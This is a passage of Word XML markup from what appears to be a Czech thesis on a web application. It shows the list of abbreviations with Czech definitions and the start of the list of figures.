        <w:t>Seznam použitých symbolů a zkratek</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tbl>
      <w:tblPr>
        <w:tblW w:w="8859" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1191"/>
        <w:gridCol w:w="162"/>
        <w:gridCol w:w="7506"/>
      </w:tblGrid>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>API</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jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Application</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Programming</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Iterface</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> – programové rozhraní systému určené pro integraci s jinými systémy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>CAPTCHA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00103D93">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Turingův</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> test používaný na internetu pro odlišení lidí od robotů. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>CSS</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pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cascading</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Style </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Sheets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> – kaskádové styly definující vzhled webu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00EC187D">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>CSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00746A4B">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Comma</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>separated</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>values</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> – formát souboru, kde se hodnoty oddělují </w:t>
            </w:r>
            <w:r w:rsidR="00746A4B">
              <w:t>čárkou</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00103D93">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Document</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Object</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Model – Objektově orientovaná reprezentace XML nebo HTML dokumentu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>GUID</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jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Globally</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Unique</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Identifier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> – identifikátor, který na základě pravděpodobnosti zaručuje praktickou unikátnost v celosvětovém měřítku.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>JSON</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pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>JavaScript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Object</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Notation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> – platformě nezávislý datový formát.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>LDAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00021764">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>Protokol pro ukládání a přístup k datům na adresářovém serveru.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>NoSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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pPr>
            <w:r>
              <w:t>Obecné označení pro nerelační databáze.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>ORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00746A4B">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Object</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>relational</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mapping</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> – technika, která zajišťuje automatickou synchronizaci relační databáze s objektovým modelem aplikace. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>OWASP</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jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Open Web </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Application</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Security</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00746A4B">
              <w:t xml:space="preserve"> Project</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> – neziskové sdružení zabývající se bezpečností internetových aplikací.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SaaS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00E75933">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>Sof</w:t>
            </w:r>
            <w:r w:rsidR="00746A4B">
              <w:t xml:space="preserve">tware as a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00746A4B">
              <w:t>Service</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00746A4B">
              <w:t xml:space="preserve"> – Software</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> nabízen</w:t>
            </w:r>
            <w:r w:rsidR="00746A4B">
              <w:t>ý</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> formou předplacené služby.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00021764">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>Protokol určený pro přenos zpráv elektronické pošty.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="00746A4B" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>TSL/</w:t>
            </w:r>
            <w:r w:rsidR="0067448D">
              <w:t>SSL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00746A4B">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Kryptografick</w:t>
            </w:r>
            <w:r w:rsidR="00746A4B">
              <w:t>é</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> protokol</w:t>
            </w:r>
            <w:r w:rsidR="00746A4B">
              <w:t>y</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> používan</w:t>
            </w:r>
            <w:r w:rsidR="00746A4B">
              <w:t>é</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> pro zabezpečení komunikace na internetu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>UC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00021764">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>Use Case – případ užití.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="005F6C11">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Uniform</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Resource</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Locator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> – řetězec určující umístění souboru nebo služby na internetu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>UX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00EC187D">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">User </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Experience</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> – uživatelská spokojenost nebo použitelnost.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067448D" w:rsidTr="00103D93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:r>
              <w:t>XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0067448D" w:rsidRDefault="0067448D" w:rsidP="00103D93">
            <w:pPr>
              <w:pStyle w:val="Bezodstavce"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Extensible</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Markup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Language</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> – obecný značkovací jazyk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nadpis"/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:bookmarkStart w:id="326" w:name="_Toc37577737"/>
      <w:bookmarkStart w:id="327" w:name="_Toc88120448"/>
      <w:bookmarkStart w:id="328" w:name="_Toc88120685"/>
      <w:bookmarkStart w:id="329" w:name="_Toc88120897"/>
      <w:bookmarkStart w:id="330" w:name="_Toc88121001"/>
      <w:bookmarkStart w:id="331" w:name="_Toc88121044"/>
      <w:bookmarkStart w:id="332" w:name="_Toc88121181"/>
      <w:bookmarkStart w:id="333" w:name="_Toc88121555"/>
      <w:bookmarkStart w:id="334" w:name="_Toc88121612"/>
      <w:bookmarkStart w:id="335" w:name="_Toc88121750"/>
      <w:bookmarkStart w:id="336" w:name="_Toc88122016"/>
      <w:bookmarkStart w:id="337" w:name="_Toc88124621"/>
      <w:bookmarkStart w:id="338" w:name="_Toc88124658"/>
      <w:bookmarkStart w:id="339" w:name="_Toc88124808"/>
      <w:bookmarkStart w:id="340" w:name="_Toc88125791"/>
      <w:bookmarkStart w:id="341" w:name="_Toc88126311"/>
      <w:bookmarkStart w:id="342" w:name="_Toc88126462"/>
      <w:bookmarkStart w:id="343" w:name="_Toc88126529"/>
      <w:bookmarkStart w:id="344" w:name="_Toc88126558"/>
      <w:bookmarkStart w:id="345" w:name="_Toc88126774"/>
      <w:bookmarkStart w:id="346" w:name="_Toc88126864"/>
      <w:bookmarkStart w:id="347" w:name="_Toc88127105"/>
      <w:bookmarkStart w:id="348" w:name="_Toc88127148"/>
      <w:bookmarkStart w:id="349" w:name="_Toc88128513"/>
      <w:bookmarkStart w:id="350" w:name="_Toc107634155"/>
      <w:bookmarkStart w:id="351" w:name="_Toc107635190"/>
      <w:bookmarkStart w:id="352" w:name="_Toc107635230"/>
      <w:bookmarkStart w:id="353" w:name="_Toc107635247"/>
      <w:bookmarkStart w:id="354" w:name="_Toc387327905"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Seznam obrázků</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sidR="00956893" w:rsidRDefault="004D2639">
      <w:pPr>
        <w:pStyle w:val="Seznamobrzk"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00986C98">
        <w:instrText xml:space="preserve"> TOC \h \z \c "Obr." </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc387327907" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="001E117B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Obr. 1. Graf zobrazující kolik osob v ČR má přehled o svých financích. [1]</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
